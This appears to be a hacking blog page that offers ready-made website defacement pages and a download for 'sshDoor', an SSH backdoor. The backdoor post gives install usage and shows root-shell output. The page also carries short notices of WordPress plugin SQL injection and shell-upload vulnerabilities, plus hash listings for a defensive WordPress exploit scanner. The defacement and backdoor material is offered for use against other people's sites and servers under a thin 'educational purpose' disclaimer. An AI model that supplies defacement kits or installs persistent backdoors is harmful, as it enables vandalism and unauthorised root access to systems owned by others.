Just Educational Purpose Only For Pentesters And Developers

  • challenge

    I was addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses. Kevin Mitnick

    Read More
  • Computer hacking

    Computer hacking really results in financial losses and hassles. The objectives of terrorist groups are more serious. That is not to say that cyber groups can't access a telephone switch in Manhattan on a day like 9/11, shut it down, and therefore cause more casualties.Kevin Mitnick

    Read More
  • The only Entertainment

    Hacking was the only entertainment that would occupy my mind - like a huge video game, but with real consequences. I could have evaded the FBI a lot longer if I had been able to control my passion for hacking.Kevin Mitnick

    Read More

Wednesday, April 29, 2015

Best Deface pages Collection

Don't Have Time for designing A Deface page .. ?? 
dont worry here you can download Best Deface Pages, 
Just replace the Name and messgae with your own name and message !!
[Click on Download And Copy The Code, Then Use it, for demo you can paste the code on Pastehtml.com

How to edit and save it... ??
All html codes are shared on pastebin, copy it and paste in notepad
then edit it and save as index.html or anyname.html


1- Tiger M@te's Deface Page, 
This Deface page was uploaded on google bangladesh'd domain Google.com.bd
 : Download


2- Happy Birhthday Deface Page 
for making someone's Birthday special =)
 : Download

3- Deface Page For Long Messages + Video 
Designed By Ffessxt Prince indishell
: Download 


4- #opFreedom Plestine, 
Deface page with free palestine message, Designed by The Hackers army
 : Download


5- Lovely deface Page for Your Girlfried or loved one 
This Deface Page was designed by me =)
 : Download


6-Deface Page with dancing firefox script
 : Download


7-Multi colour deface page
 : Download  


8- Simple Black Deface Page 
Designed by Hax root
 : Download


9-Matrix Style Deface Page
Designed by ShOrTy420
 : Download


10-Pro Style Deface Page 
 : Download


9- Awesome  #opFreedom Plestine Page with New Fuctions
this page desgned by Syakila Daniel
 : Download


10- Awesme Matrix style Deface Page 
Designed by coded32 
: Download


11- Romantic deface Page with Roses
designed by Deepak  Carpenter
: Download


12- Deface Page with Jquery 
Designed by Privatex
 : Download


13- #opmegaupload Deface Page
 : Download

14- A Progammer's Deface Page with Love Letter
Designed by Me .. =)
 : Download

Wordpress Exploit Scanner


This plugin searches the files on your website, and the posts and comments tables of your database for anything suspicious. It also examines your list of active plugins for unusual filenames.
It does not remove anything. That is left to the user to do.
Latest MD5 hash values for Exploit Scanner:
  • exploit-scanner.php (1.4.4): 9a4bfd1308559c9622f086ef75aaf531
  • hashes-3.7.3.php: c3b48788de101707239c9e652dcdb4b6
  • hashes-3.7.4.php: 43709b77e946828ac811065bef976470
  • hashes-3.7.5.php: 9dce09d8778aeb5f4f0820e05eea8dac
  • hashes-3.7.6.php: 8e9da6704297078c8fa1c87366624d9b
  • hashes-3.7.7.php: 58270d3420814e558a077d8b35b9745e
  • hashes-3.8.4.php: 8a75d07a382eab4a8d9b3c75d0dd405a
  • hashes-3.8.5.php: 8a5b5c3f8b59e32c020a444976812d67
  • hashes-3.8.6.php: 06c0fda276e0b7adc39ab2d7fc0f0e08
  • hashes-3.8.7.php: 4d271f223b34095835296bffac1d35ea
  • hashes-3.9.3.php: d801e2df206eb1978b6f98ca370a3ca8
  • hashes-3.9.4.php: bc74640b26084b595970dedd0b80a0ff
  • hashes-3.9.5.php: 858f7ed3a0630e1781ec1c5ef2453dfa
  • hashes-4.0.2.php: f9c95ba7cb8fda4d6e1b4a4c280a34d4
  • hashes-4.0.3.php: 0bcfaee6372c94b11605127ad27747fc
  • hashes-4.0.4.php: 3f7e172c2c74480b126d2a73a0cc61c7
  • hashes-4.1.php: c1733c9f307496748e3ec0c81a9f239a
  • hashes-4.1.1.php: 772fe89e21ebad53cfcd0a68ac02b9f9
  • hashes-4.1.2.php: b29aaa82fe791785648cc92081ac2b0e
  • hashes-4.1.3.php: 1623611856c135fbe94726c5e77e94c4
  • hashes-4.1.4.php: 08fe41a7c524f3757da47debad5bf3a3
  • hashes-4.2.php: f7dbff571961db8213b3c892dd5d5949
  • hashes-4.2.1.php: 5006775e52e0af2aa67358ceae189c38
Latest SHA1 hash values for Exploit Scanner:

Wednesday, April 15, 2015

WordPress Video Gallery 2.8 SQL Injection Vulnerability


Via-> Homelab.it

WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Via---> Homelab.it

Friday, April 3, 2015

sshDoor( one of Best ssh backdoor )


 Usage:
./install passwrod port
./install jancok 33
 
open putty
ssh port : 33 login : root password : jancok
[root@serv ~]# uname -a;id
Linux serv.test.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 20010 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv ~]# 

Download:  Here